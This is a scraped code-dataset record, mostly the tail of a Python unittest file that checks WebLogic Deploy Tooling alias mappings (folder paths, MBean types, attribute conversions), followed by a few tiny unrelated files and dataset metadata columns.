flattened_info = self.aliases.get_wlst_flattened_folder_info(location)
online_flattened_info = self.online_aliases.get_wlst_flattened_folder_info(location)
self.assertNotEqual(flattened_info, None)
name = flattened_info.get_mbean_name()
online_name = online_flattened_info.get_mbean_name()
type = flattened_info.get_mbean_type()
self.assertEqual(name, 'NO_NAME_0')
self.assertEqual(online_name, 'my-datasource')
self.assertEqual(type, 'Properties')
expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource/JDBCDriverParams/NO_NAME_0/Properties'
result = self.aliases.get_wlst_flattened_folder_list_path(location)
self.assertEqual(result, expected)
expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource/JDBCDriverParams/NO_NAME_0'
result = self.aliases.get_wlst_flattened_folder_create_path(location)
self.assertEqual(result, expected)
return
def testModelFolderPath(self):
location = get_jdbc_params_properties_location('my-datasource', self.aliases)
expected = 'resources:/JDBCSystemResource/my-datasource/JdbcResource/JDBCDriverParams/Properties'
path = self.aliases.get_model_folder_path(location)
self.assertEqual(path, expected)
token_name = self.aliases.get_name_token(location)
if token_name is not None:
location.add_name_token(token_name, 'user')
expected = 'resources:/JDBCSystemResource/my-datasource/JdbcResource/JDBCDriverParams/Properties/user'
path = self.aliases.get_model_folder_path(location)
self.assertEqual(path, expected)
expected = 'topology:/SecurityConfiguration/Realm/myrealm/AuthenticationProvider/' \
'MyLDAPAuthentication/LDAPAuthenticator'
# Test artificial folder for security providers
location = LocationContext().append_location(FOLDERS.SECURITY_CONFIGURATION)
token_name = self.aliases.get_name_token(location)
if token_name is not None:
location.add_name_token(token_name, 'mydomain')
location.append_location(FOLDERS.REALM)
token_name = self.aliases.get_name_token(location)
if token_name is not None:
location.add_name_token(token_name, 'myrealm')
location.append_location(FOLDERS.AUTHENTICATION_PROVIDER)
token_name = self.aliases.get_name_token(location)
if token_name is not None:
location.add_name_token(token_name, 'MyLDAPAuthentication')
location.append_location(FOLDERS.LDAP_AUTHENTICATOR)
result = self.aliases.get_model_folder_path(location)
self.assertEqual(result, expected)
return
def testIsValidModelFolderName(self):
location = LocationContext()
result, message = self.aliases.is_valid_model_folder_name(location, 'ServerTemplate')
self.assertEqual(result, ValidationCodes.VALID)
aliases = Aliases(self.model_context, wls_version='12.1.1')
result, message = aliases.is_valid_model_folder_name(location, 'ServerTemplate')
self.assertEqual(result, ValidationCodes.VERSION_INVALID)
result, message = self.aliases.is_valid_model_folder_name(location, 'ServerTemplates')
self.assertEqual(result, ValidationCodes.INVALID)
top_level_topology_folders = self.aliases.get_model_topology_top_level_folder_names()
for folder in top_level_topology_folders:
result, message = self.aliases.is_valid_model_folder_name(location, folder)
self.assertEqual(result, ValidationCodes.VALID)
return
def testBooleanDefaultValues(self):
location = LocationContext().append_location(FOLDERS.RESTFUL_MANAGEMENT_SERVICES, DOMAIN='mydomain')
name, value = self.aliases.get_model_attribute_name_and_value(location, 'JavaServiceResourcesEnabled', 'false')
self.assertEqual(name, 'JavaServiceResourcesEnabled')
self.assertEqual(value, None)
return
def testGetWlstAttributeJavaBoolean(self):
location = LocationContext().append_location(FOLDERS.SECURITY_CONFIGURATION)
token = self.aliases.get_name_token(location)
location.add_name_token(token, 'my-domain')
location.append_location(FOLDERS.REALM, REALM="myrealm").\
append_location(FOLDERS.AUTHENTICATION_PROVIDER, PROVIDER='myprovider').\
append_location(FOLDERS.ACTIVE_DIRECTORY_AUTHENTICATOR)
name, value = self.aliases.get_wlst_attribute_name_and_value(location, 'UseRetrievedUserNameAsPrincipal',
'true')
self.assertEqual(name, 'UseRetrievedUserNameAsPrincipal')
self.assertEqual(value, Boolean('true'))
return
def testGetWlstAttributeJavaBooleanNewIssue157(self):
location = LocationContext().append_location(FOLDERS.SECURITY_CONFIGURATION)
token = self.aliases.get_name_token(location)
location.add_name_token(token, 'my-domain')
location.append_location(FOLDERS.REALM, REALM="myrealm"). \
append_location(FOLDERS.AUTHENTICATION_PROVIDER, PROVIDER='myprovider'). \
append_location(FOLDERS.ACTIVE_DIRECTORY_AUTHENTICATOR)
name, value = self.aliases.get_wlst_attribute_name_and_value(location, 'UseTokenGroupsForGroupMembershipLookup',
'true')
self.assertEqual(name, 'UseTokenGroupsForGroupMembershipLookup')
self.assertEqual(value, Boolean('true'))
return
def testSecurityProviderTypeHandling(self):
location = LocationContext().append_location(FOLDERS.SECURITY_CONFIGURATION)
token = self.aliases.get_name_token(location)
location.add_name_token(token, 'my-domain')
location.append_location(FOLDERS.REALM)
token = self.aliases.get_name_token(location)
location.add_name_token(token, 'myrealm')
location.append_location(FOLDERS.AUTHENTICATION_PROVIDER)
result = self.aliases.requires_artificial_type_subfolder_handling(location)
self.assertEqual(result, True)
location.append_location(FOLDERS.DEFAULT_AUTHENTICATOR)
try:
self.aliases.requires_artificial_type_subfolder_handling(location)
self.assertEqual(True, False, 'Excepted AliasException to be thrown')
except AliasException, ae:
pass
return
def testSecurityProviderGetAttributes(self):
location = LocationContext().append_location(FOLDERS.SECURITY_CONFIGURATION)
token = self.aliases.get_name_token(location)
location.add_name_token(token, 'my-domain')
location.append_location(FOLDERS.REALM)
token = self.aliases.get_name_token(location)
location.add_name_token(token, 'myrealm')
location.append_location(FOLDERS.AUTHENTICATION_PROVIDER)
token = self.aliases.get_name_token(location)
location.add_name_token(token, 'MyDefaultAuthenticator')
# result = self.aliases.get_wlst_attributes_path(location)
# self.assertEqual(result,
# '/SecurityConfiguration/my-domain/Realm/myrealm/AuthenticationProvider/MyDefaultAuthenticator')
model_subfolder_name = self.aliases.get_model_subfolder_name(location,
'weblogic.security.providers.authentication.DefaultAuthenticatorMBean')
self.assertEqual(model_subfolder_name, 'DefaultAuthenticator')
location.append_location(model_subfolder_name)
result = self.aliases.get_wlst_attributes_path(location)
self.assertEqual(result,
'/SecurityConfiguration/my-domain/Realm/myrealm/AuthenticationProvider/MyDefaultAuthenticator')
model_name, model_value = self.aliases.get_model_attribute_name_and_value(location, 'CompatibilityObjectName',
'MyObjectName')
self.assertEqual(model_name, 'CompatibilityObjectName')
self.assertEquals(model_value, 'MyObjectName')
return
def testJrfSecurityProviderDiscovery(self):
location = LocationContext().append_location(FOLDERS.SECURITY_CONFIGURATION)
token = self.aliases.get_name_token(location)
location.add_name_token(token, 'my-domain')
location.append_location(FOLDERS.REALM)
token = self.aliases.get_name_token(location)
location.add_name_token(token, 'myrealm')
location.append_location(FOLDERS.AUTHENTICATION_PROVIDER)
token = self.aliases.get_name_token(location)
location.add_name_token(token, 'myprovider')
result = self.aliases.get_model_subfolder_name(location,
'weblogic.security.providers.saml.SAMLAuthenticatorMBean')
self.assertEqual(result, 'SAMLAuthenticator')
return
def testUsesPathTokenAttributeNames(self):
location = LocationContext().append_location(FOLDERS.APPLICATION)
token = self.aliases.get_name_token(location)
location.add_name_token(token, 'my-app')
expected = ['PlanPath', 'SourcePath', 'AltDescriptorPath', 'AltWLSDescriptorPath',
'InstallDir', 'PlanDir', 'AltDescriptorDir']
result = self.aliases.get_model_uses_path_tokens_attribute_names(location)
self.assertNotEqual(result, None, 'expected uses_path_tokens attribute names list to not be None')
self.assertEqual(len(result), len(expected))
for name in result:
if name not in expected:
self.assertEqual(True, False, "attribute name %s not in the list of expected names" % name)
return
def testDefaultValueStringCompares(self):
location=LocationContext().append_location(FOLDERS.SERVER)
token = self.aliases.get_name_token(location)
location.add_name_token(token, 'AdminServer')
model_name, model_value = self.aliases.get_model_attribute_name_and_value(location, 'Notes', '')
self.assertEqual(model_name, 'Notes')
self.assertEqual(model_value, None)
model_name, model_value = self.aliases.get_model_attribute_name_and_value(location, 'Notes', None)
self.assertEqual(model_name, 'Notes')
self.assertEqual(model_value, None)
return
def _assertMapEqual(self, expected, testObject):
self.assertEqual(expected.size(), testObject.size())
for key in expected.keys():
self.assertEqual(expected.get(key), testObject.get(str(key).strip()))
return
def testIssue36Fix(self):
base_location = LocationContext().append_location(FOLDERS.RESOURCE_MANAGER)
token = self.aliases.get_name_token(base_location)
base_location.add_name_token(token, 'ResourceManager-0')
location = LocationContext(base_location).append_location(FOLDERS.CPU_UTILIZATION)
token = self.aliases.get_name_token(location)
location.add_name_token(token, 'CpuUtilization-0')
location.append_location(FOLDERS.TRIGGER)
token = self.aliases.get_name_token(location)
location.add_name_token(token, 'Trigger-0')
expected = [FOLDERS.TRIGGER, '%ss' % FOLDERS.TRIGGER]
wlst_mbean_type = self.aliases.get_wlst_mbean_type(location)
self.assertEqual(wlst_mbean_type, expected[0])
wlst_mbean_type = self.online_aliases.get_wlst_mbean_type(location)
self.assertEqual(wlst_mbean_type, expected[1])
location = LocationContext(base_location).append_location(FOLDERS.FILE_OPEN)
token = self.aliases.get_name_token(location)
location.add_name_token(token, 'FileOpen-0')
location.append_location(FOLDERS.TRIGGER)
token = self.aliases.get_name_token(location)
location.add_name_token(token, 'Trigger-0')
wlst_mbean_type = self.aliases.get_wlst_mbean_type(location)
self.assertEqual(wlst_mbean_type, expected[0])
wlst_mbean_type = self.online_aliases.get_wlst_mbean_type(location)
self.assertEqual(wlst_mbean_type, expected[1])
location = LocationContext(base_location).append_location(FOLDERS.HEAP_RETAINED)
token = self.aliases.get_name_token(location)
location.add_name_token(token, 'HeapRetained-0')
location.append_location(FOLDERS.TRIGGER)
token = self.aliases.get_name_token(location)
location.add_name_token(token, 'Trigger-0')
wlst_mbean_type = self.aliases.get_wlst_mbean_type(location)
self.assertEqual(wlst_mbean_type, expected[0])
wlst_mbean_type = self.online_aliases.get_wlst_mbean_type(location)
self.assertEqual(wlst_mbean_type, expected[1])
return
def testIssue37Fix(self):
location = LocationContext().append_location(FOLDERS.WLDF_SYSTEM_RESOURCE)
token = self.aliases.get_name_token(location)
location.add_name_token(token, 'WLDFSystemResource-0')
location.append_location(FOLDERS.WLDF_RESOURCE)
location.append_location(FOLDERS.WATCH_NOTIFICATION)
token = self.aliases.get_name_token(location)
location.add_name_token(token, 'WatchNotification-0')
location.append_location(FOLDERS.HEAP_DUMP_ACTION)
token = self.aliases.get_name_token(location)
location.add_name_token(token, 'HeapDumpAction-0')
wlst_mbean_type = self.aliases.get_wlst_mbean_type(location)
expected = FOLDERS.HEAP_DUMP_ACTION
self.assertEqual(wlst_mbean_type, expected)
wlst_mbean_type = self.online_aliases.get_wlst_mbean_type(location)
expected = '%ss' % FOLDERS.HEAP_DUMP_ACTION
self.assertEqual(wlst_mbean_type, expected)
return
def testIssue38Fix(self):
location = LocationContext().append_location(FOLDERS.PARTITION)
token = self.aliases.get_name_token(location)
location.add_name_token(token, 'Partition-0')
# Check offline value of wlst_mbean_type of FOLDERS.PARTITION
wlst_mbean_type = self.aliases.get_wlst_mbean_type(location)
expected = FOLDERS.PARTITION
self.assertEqual(wlst_mbean_type, expected)
# Check online value of wlst_mbean_type of FOLDERS.PARTITION.
# There should be an 's' on the end of FOLDERS.PARTITION
wlst_mbean_type = self.online_aliases.get_wlst_mbean_type(location)
expected = '%ss' % FOLDERS.PARTITION
self.assertEqual(wlst_mbean_type, expected)
# Add FOLDERS.PARTITION_WORK_MANAGER to the location
location.append_location(FOLDERS.PARTITION_WORK_MANAGER)
token = self.aliases.get_name_token(location)
location.add_name_token(token, 'PartitionWorkManager-0')
# Check offline value of wlst_mbean_type after adding
# FOLDERS.PARTITION_WORK_MANAGER to the location. There
# should not be an 's' on the end of FOLDERS.PARTITION_WORK_MANAGER
wlst_mbean_type = self.aliases.get_wlst_mbean_type(location)
expected = FOLDERS.PARTITION_WORK_MANAGER
self.assertEqual(wlst_mbean_type, expected)
# Check online value of wlst_mbean_type after adding
# FOLDERS.PARTITION_WORK_MANAGER to the location. It
# should be the same value as offline; no 's' on the
# end of FOLDERS.PARTITION_WORK_MANAGER
wlst_mbean_type = self.online_aliases.get_wlst_mbean_type(location)
self.assertEqual(wlst_mbean_type, expected)
# Check offline value of wlst_list_path after adding
# FOLDERS.PARTITION_WORK_MANAGER to the location. There
# should not be an 's' on the end of FOLDERS.PARTITION or
# FOLDERS.PARTITION_WORK_MANAGER
expected = [FOLDERS.PARTITION, 'Partition-0', FOLDERS.PARTITION_WORK_MANAGER]
wlst_list_path = self.aliases.get_wlst_list_path(location)
self.assertEqual(wlst_list_path, '/%s' % '/'.join(expected))
# Check online value of wlst_list_path after adding
# FOLDERS.PARTITION_WORK_MANAGER to the location. There
# should be an 's' on the end of FOLDERS.PARTITION, but
# not on the end of FOLDERS.PARTITION_WORK_MANAGER
expected = ['%ss' % FOLDERS.PARTITION, 'Partition-0', FOLDERS.PARTITION_WORK_MANAGER]
wlst_list_path = self.online_aliases.get_wlst_list_path(location)
self.assertEqual(wlst_list_path, '/%s' % '/'.join(expected))
# Check offline value of wlst_subfolders_path after adding
# FOLDERS.PARTITION_WORK_MANAGER to the location. There
# should be an 's' on the end of FOLDERS.PARTITION, but
# not on the end of FOLDERS.PARTITION_WORK_MANAGER
expected = [FOLDERS.PARTITION, 'Partition-0', FOLDERS.PARTITION_WORK_MANAGER, 'PartitionWorkManager-0']
wlst_subfolders_path = self.aliases.get_wlst_subfolders_path(location)
self.assertEqual(wlst_subfolders_path, '/%s' % '/'.join(expected))
# Check online value of wlst_subfolders_path after adding
# FOLDERS.PARTITION_WORK_MANAGER to the location. There
# should be an 's' on the end of FOLDERS.PARTITION, but
# not on the end of FOLDERS.PARTITION_WORK_MANAGER
expected = ['%ss' % FOLDERS.PARTITION, 'Partition-0', FOLDERS.PARTITION_WORK_MANAGER, 'PartitionWorkManager-0']
wlst_subfolders_path = self.online_aliases.get_wlst_subfolders_path(location)
self.assertEqual(wlst_subfolders_path, '/%s' % '/'.join(expected))
return
def testIssue39Fix(self):
location = LocationContext().append_location(FOLDERS.PARTITION)
token = self.aliases.get_name_token(location)
location.add_name_token(token, 'Partition-0')
# Check offline value of wlst_mbean_type of FOLDERS.PARTITION
wlst_mbean_type = self.aliases.get_wlst_mbean_type(location)
expected = FOLDERS.PARTITION
self.assertEqual(wlst_mbean_type, expected)
# Check online value of wlst_mbean_type of FOLDERS.PARTITION.
# There should be an 's' on the end of FOLDERS.PARTITION
wlst_mbean_type = self.online_aliases.get_wlst_mbean_type(location)
expected = '%ss' % FOLDERS.PARTITION
self.assertEqual(wlst_mbean_type, expected)
# Add FOLDERS.RESOURCE_MANAGER to the location
location.append_location(FOLDERS.RESOURCE_MANAGER)
token = self.aliases.get_name_token(location)
location.add_name_token(token, 'ResourceManager-0')
# Check offline value of wlst_mbean_type after adding
# FOLDERS.RESOURCE_MANAGER to the location. There
# should not be an 's' on the end of FOLDERS.RESOURCE_MANAGER
wlst_mbean_type = self.aliases.get_wlst_mbean_type(location)
expected = FOLDERS.RESOURCE_MANAGER
self.assertEqual(wlst_mbean_type, expected)
# Check online value of wlst_mbean_type after adding
# FOLDERS.RESOURCE_MANAGER to the location. It
# should be the same value as offline; no 's' on the
# end of FOLDERS.RESOURCE_MANAGER
wlst_mbean_type = self.online_aliases.get_wlst_mbean_type(location)
self.assertEqual(wlst_mbean_type, expected)
# Check offline value of wlst_list_path after adding
# FOLDERS.RESOURCE_MANAGER to the location. There
# should not be an 's' on the end of FOLDERS.PARTITION or
# FOLDERS.RESOURCE_MANAGER
expected = [FOLDERS.PARTITION, 'Partition-0', FOLDERS.RESOURCE_MANAGER]
wlst_list_path = self.aliases.get_wlst_list_path(location)
self.assertEqual(wlst_list_path, '/%s' % '/'.join(expected))
# Check online value of wlst_list_path after adding
# FOLDERS.RESOURCE_MANAGER to the location. There
# should be an 's' on the end of FOLDERS.PARTITION, but
# not on the end of FOLDERS.RESOURCE_MANAGER
expected = ['%ss' % FOLDERS.PARTITION, 'Partition-0', FOLDERS.RESOURCE_MANAGER]
wlst_list_path = self.online_aliases.get_wlst_list_path(location)
self.assertEqual(wlst_list_path, '/%s' % '/'.join(expected))
# Check offline value of wlst_subfolders_path after adding
# FOLDERS.RESOURCE_MANAGER to the location. There
# should be an 's' on the end of FOLDERS.PARTITION, but
# not on the end of FOLDERS.RESOURCE_MANAGER
expected = [FOLDERS.PARTITION, 'Partition-0', FOLDERS.RESOURCE_MANAGER, 'ResourceManager-0']
wlst_subfolders_path = self.aliases.get_wlst_subfolders_path(location)
self.assertEqual(wlst_subfolders_path, '/%s' % '/'.join(expected))
# Check online value of wlst_subfolders_path after adding
# FOLDERS.RESOURCE_MANAGER to the location. There
# should be an 's' on the end of FOLDERS.PARTITION, but
# not on the end of FOLDERS.RESOURCE_MANAGER
expected = ['%ss' % FOLDERS.PARTITION, 'Partition-0', FOLDERS.RESOURCE_MANAGER, 'ResourceManager-0']
wlst_subfolders_path = self.online_aliases.get_wlst_subfolders_path(location)
self.assertEqual(wlst_subfolders_path, '/%s' % '/'.join(expected))
return
def testIssue50Fix(self):
location = LocationContext().append_location(FOLDERS.SERVER_TEMPLATE)
token = self.aliases.get_name_token(location)
location.add_name_token(token, 'ServerTemplate-0')
location.append_location(FOLDERS.WEB_SERVICE)
location.append_location(FOLDERS.WEB_SERVICE_BUFFERING)
wlst_attribute_name = self.aliases.get_wlst_attribute_name(location, 'RetryCount')
expected = 'RetryCount'
self.assertEqual(wlst_attribute_name, expected)
wlst_attribute_name = self.online_aliases.get_wlst_attribute_name(location, 'RetryCount')
self.assertEqual(wlst_attribute_name, expected)
return
def testIssue57Fix(self):
location = LocationContext().append_location(FOLDERS.LOG)
token = self.aliases.get_name_token(location)
location.add_name_token(token, 'DemoDomain')
expected = 'true'
default_value = self.online_aliases.get_model_attribute_default_value(location, 'RotateLogOnStartup')
self.assertEqual(default_value, expected)
return
def testIssue91Fix(self):
location = LocationContext().append_location(FOLDERS.NM_PROPERTIES)
expected = 'startWebLogic.cmd'
default_value = self.aliases.get_model_attribute_default_value(location, 'weblogic.StartScriptName')
self.assertEqual(default_value, expected)
expected = '/'
wlst_list_path = self.aliases.get_wlst_list_path(location)
self.assertEqual(wlst_list_path, expected)
# NMProperties is an offline only folder and the get_model_attribute_default_value will throw and exception
model_attribute_name = 'weblogic.StartScriptName'
self.assertRaises(AliasException, getattr(self.online_aliases, 'get_model_attribute_default_value'),
location, model_attribute_name)
# this method will not return an exception but should return a None
default_name, default_value = \
self.online_aliases.get_wlst_attribute_name_and_value(location, model_attribute_name, 'script')
expected = None
self.assertEqual(default_value, expected)
return
def testGetModelAttributeName(self):
location=LocationContext().append_location(FOLDERS.JMS_SYSTEM_RESOURCE)
location.add_name_token(self.aliases.get_name_token(location), 'TheModule')
location.append_location(FOLDERS.JMS_RESOURCE)
add_default_token_value(location, self.aliases)
location.append_location(FOLDERS.DISTRIBUTED_TOPIC)
location.add_name_token(self.aliases.get_name_token(location), 'TheTopic')
# model name should be the same, whether online or offline
expected_model_name = 'SafExportPolicy'
model_name = self.aliases.get_model_attribute_name(location, 'SafExportPolicy')
self.assertEqual(model_name, expected_model_name)
model_name = self.online_aliases.get_model_attribute_name(location, 'SAFExportPolicy')
self.assertEqual(model_name, expected_model_name)
return
def testJarrayWithPreferredAndStringArray(self):
location = LocationContext().append_location(FOLDERS.SERVER)
location.add_name_token(self.aliases.get_name_token(location), 'AdminServer')
empty_array = jarray.array([], String)
attribute = 'JNDITransportableObjectFactoryList'
expected = None
actual_attr, actual_value = self.aliases.get_model_attribute_name_and_value(location, attribute, empty_array)
self.assertEqual(expected, actual_value)
actual_attr, actual_value = self.aliases.get_wlst_attribute_name_and_value(location, actual_attr, actual_value)
self.assertEqual(expected, actual_value)
attribute_array = jarray.array(['factory1', 'factory2'], String)
model_expected = 'factory1,factory2'
wlst_expected = attribute_array
actual_attr, actual_value = self.aliases.get_model_attribute_name_and_value(location, attribute,
attribute_array)
self.assertEqual(model_expected, actual_value)
actual_attr, actual_value = self.aliases.get_wlst_attribute_name_and_value(location, actual_attr, actual_value)
self.assertEqual(wlst_expected, actual_value)
def testListGetToList(self):
location = LocationContext().append_location(FOLDERS.SERVER)
location.add_name_token(self.aliases.get_name_token(location), 'AdminServer')
location = location.append_location(FOLDERS.SSL)
location.add_name_token(self.aliases.get_name_token(location), 'AdminServer')
wlst_list = "TLS;WITH_AES_256_CBC"
expected_wlst_list = ['TLS', 'WITH_AES_256_CBC']
expected_wlst_set_list = ['TLS', 'WITH_AES_256_CBC']
attribute = 'Ciphersuite'
actual_attr, actual_value = self.aliases.get_model_attribute_name_and_value(location, attribute, wlst_list)
self.assertEqual(expected_wlst_list, actual_value)
actual_attr, actual_value = self.aliases.get_wlst_attribute_name_and_value(location, actual_attr, actual_value)
self.assertEqual(expected_wlst_set_list, actual_value)
def testGetJTA(self):
location = LocationContext()
location.append_location(FOLDERS.JTA)
location.add_name_token('DOMAIN', 'mydomain')
offline_path = self.aliases.get_wlst_mbean_name(location)
self.assertEqual('NO_NAME_0', offline_path)
online_path = self.online_aliases.get_wlst_mbean_name(location)
self.assertEqual('mydomain', online_path)
def testJTAMigratableConstrainedCandidateServer(self):
model_value = [ 'MS-1', 'MS-2']
wlst_value_expected = 'MS-1,MS-2'
location = LocationContext()
location.append_location(FOLDERS.SERVER)
location.add_name_token(self.aliases.get_name_token(location), 'MS-1')
location.append_location(FOLDERS.JTA_MIGRATABLE_TARGET)
location.add_name_token(self.aliases.get_name_token(location), 'NO_NAME_0')
wlst_attribute, wlst_value = \
self.aliases.get_wlst_attribute_name_and_value(location, FOLDERS.CONSTRAINED_CANDIDATE_SERVER, model_value)
self.assertEquals(wlst_value_expected, wlst_value)
def testReadOnlyDiscoverAttribute(self):
location = LocationContext()
location.add_name_token(self.online_aliases.get_name_token(location), 'my-domain')
model_attribute, model_value = \
self.online_aliases.get_model_attribute_name_and_value(location, FOLDERS.DOMAIN_VERSION, '12.2.1.3.0')
self.assertEquals('12.2.1.3.0', model_value)
wlst_attribute, wlst_value = \
self.online_aliases.get_wlst_attribute_name_and_value(location, FOLDERS.DOMAIN_VERSION, '12.2.1.3.0')
self.assertEquals(None, wlst_value)
def testFolderOrder(self):
expected_list = ['DefaultAuthenticator', 'DefaultIdentityAsserter']
location = LocationContext()
location.append_location(FOLDERS.SECURITY_CONFIGURATION)
location.add_name_token(self.aliases.get_name_token(location), 'mydomain')
location.append_location(FOLDERS.REALM)
location.add_name_token(self.aliases.get_name_token(location), 'myrealm')
location.append_location(FOLDERS.AUTHENTICATION_PROVIDER)
actual_list = self.aliases.get_subfolders_in_order(location)
self.assertEquals(len(expected_list), len(actual_list))
self.assertEquals(expected_list[0], actual_list[0])
self.assertEquals(expected_list[1], actual_list[1])
def get_jdbc_ds_params_location(name, aliases):
location = get_jdbc_resource_location(name, aliases)
location.append_location(FOLDERS.JDBC_DATASOURCE_PARAMS)
add_default_token_value(location, aliases)
return location
def get_jdbc_params_properties_location(name, aliases):
location = get_jdbc_driver_params_location(name, aliases)
add_jdbc_params_properties(location, aliases)
return location
def add_jdbc_params_properties(location, aliases):
location.append_location(FOLDERS.JDBC_DRIVER_PARAMS_PROPERTIES)
# don't add the token for property name
# token for flattened Properties folder
flat_info = aliases.get_wlst_flattened_folder_info(location)
location.add_name_token(flat_info.get_path_token(), flat_info.get_mbean_name())
def get_jdbc_driver_params_location(name, aliases):
location = get_jdbc_resource_location(name, aliases)
location.append_location(FOLDERS.JDBC_DRIVER_PARAMS)
add_default_token_value(location, aliases)
return location
def get_jdbc_resource_location(name, aliases):
location = LocationContext()
location.append_location(FOLDERS.JDBC_SYSTEM_RESOURCE)
location.add_name_token(aliases.get_name_token(location), name)
location.append_location(FOLDERS.JDBC_RESOURCE)
add_default_token_value(location, aliases)
return location
def add_default_token_value(location, aliases):
token = aliases.get_name_token(location)
name = aliases.get_wlst_mbean_name(location)
location.add_name_token(token, name)
if __name__ == '__main__':
unittest.main()
| 49.068012
| 122
| 0.722069
| 7,369
| 65,653
| 6.122812
| 0.064731
| 0.048095
| 0.049026
| 0.053991
| 0.80906
| 0.779627
| 0.741971
| 0.703185
| 0.678472
| 0.657395
| 0
| 0.005449
| 0.19498
| 65,653
| 1,337
| 123
| 49.104712
| 0.848237
| 0.056509
| 0
| 0.570039
| 0
| 0
| 0.119275
| 0.067425
| 0
| 0
| 0
| 0
| 0.178016
| 0
| null | null | 0.001946
| 0.015564
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
9c587390b7911ebf1edc4e5430cd9f70b3105d7a
| 41
|
py
|
Python
|
custmaker/__init__.py
|
bibbidi0917/custmaker
|
a26073af15cf5d1afcb89c2958133c089f8a423f
|
[
"MIT"
] | null | null | null |
custmaker/__init__.py
|
bibbidi0917/custmaker
|
a26073af15cf5d1afcb89c2958133c089f8a423f
|
[
"MIT"
] | null | null | null |
custmaker/__init__.py
|
bibbidi0917/custmaker
|
a26073af15cf5d1afcb89c2958133c089f8a423f
|
[
"MIT"
] | null | null | null |
from . import setting, making, comparing
| 20.5
| 40
| 0.780488
| 5
| 41
| 6.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.146341
| 41
| 1
| 41
| 41
| 0.914286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
92f126864cc90c6c47751292e11cd1205ea947cc
| 245
|
py
|
Python
|
aioftx/wallet/schemas.py
|
metta-team/aioftx
|
f5bd028e8bf40c55c1d4632802b792be113e0978
|
[
"MIT"
] | null | null | null |
aioftx/wallet/schemas.py
|
metta-team/aioftx
|
f5bd028e8bf40c55c1d4632802b792be113e0978
|
[
"MIT"
] | null | null | null |
aioftx/wallet/schemas.py
|
metta-team/aioftx
|
f5bd028e8bf40c55c1d4632802b792be113e0978
|
[
"MIT"
] | null | null | null |
from addresses.schemas import *
from airdrops.schemas import *
from balances.schemas import *
from coins.schemas import *
from deposits.schemas import *
from history.schemas import *
from signet.schemas import *
from withdrawal.schemas import *
| 27.222222
| 32
| 0.804082
| 32
| 245
| 6.15625
| 0.34375
| 0.527919
| 0.604061
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130612
| 245
| 8
| 33
| 30.625
| 0.924883
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
1302b51e76b0bd30c6620b6eca72a063404d58de
| 159
|
py
|
Python
|
django_project/tesdt.py
|
robgrigor/Tournament
|
7709c0ee39636a32f40696677f6d6c07ea724e75
|
[
"Apache-2.0"
] | 1
|
2020-03-10T06:44:14.000Z
|
2020-03-10T06:44:14.000Z
|
django_project/tesdt.py
|
robgrigor/Tournament
|
7709c0ee39636a32f40696677f6d6c07ea724e75
|
[
"Apache-2.0"
] | 5
|
2019-09-07T21:20:21.000Z
|
2019-09-19T10:03:52.000Z
|
django_project/tesdt.py
|
robgrigor/Tournament
|
7709c0ee39636a32f40696677f6d6c07ea724e75
|
[
"Apache-2.0"
] | null | null | null |
import os
EMAIL_HOST_USER = os.environ.get('EMAIL_USER')
EMAIL_HOST_PASSWORD = os.environ.get('EMAIL_PASS')
print(EMAIL_HOST_USER)
print(EMAIL_HOST_PASSWORD)
| 22.714286
| 50
| 0.81761
| 26
| 159
| 4.615385
| 0.384615
| 0.3
| 0.216667
| 0.283333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.069182
| 159
| 7
| 51
| 22.714286
| 0.810811
| 0
| 0
| 0
| 0
| 0
| 0.125
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.4
| 0.2
| 0
| 0.2
| 0.4
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
13187f3087d5ba709d315350f8b744c3dd8bb12f
| 22
|
py
|
Python
|
vehicle/adapt-sysroot/ros_install_isolated/lib/python2.7/dist-packages/std_srvs/srv/__init__.py
|
slicht-uri/Sandshark-Beta-Lab-
|
6cff36b227b49b776d13187c307e648d2a52bdae
|
[
"MIT"
] | null | null | null |
vehicle/adapt-sysroot/ros_install_isolated/lib/python2.7/dist-packages/std_srvs/srv/__init__.py
|
slicht-uri/Sandshark-Beta-Lab-
|
6cff36b227b49b776d13187c307e648d2a52bdae
|
[
"MIT"
] | null | null | null |
vehicle/adapt-sysroot/ros_install_isolated/lib/python2.7/dist-packages/std_srvs/srv/__init__.py
|
slicht-uri/Sandshark-Beta-Lab-
|
6cff36b227b49b776d13187c307e648d2a52bdae
|
[
"MIT"
] | 1
|
2019-10-18T06:25:14.000Z
|
2019-10-18T06:25:14.000Z
|
from ._Empty import *
| 11
| 21
| 0.727273
| 3
| 22
| 5
| 1
| 0
| 0
| 0
| 0
| 0
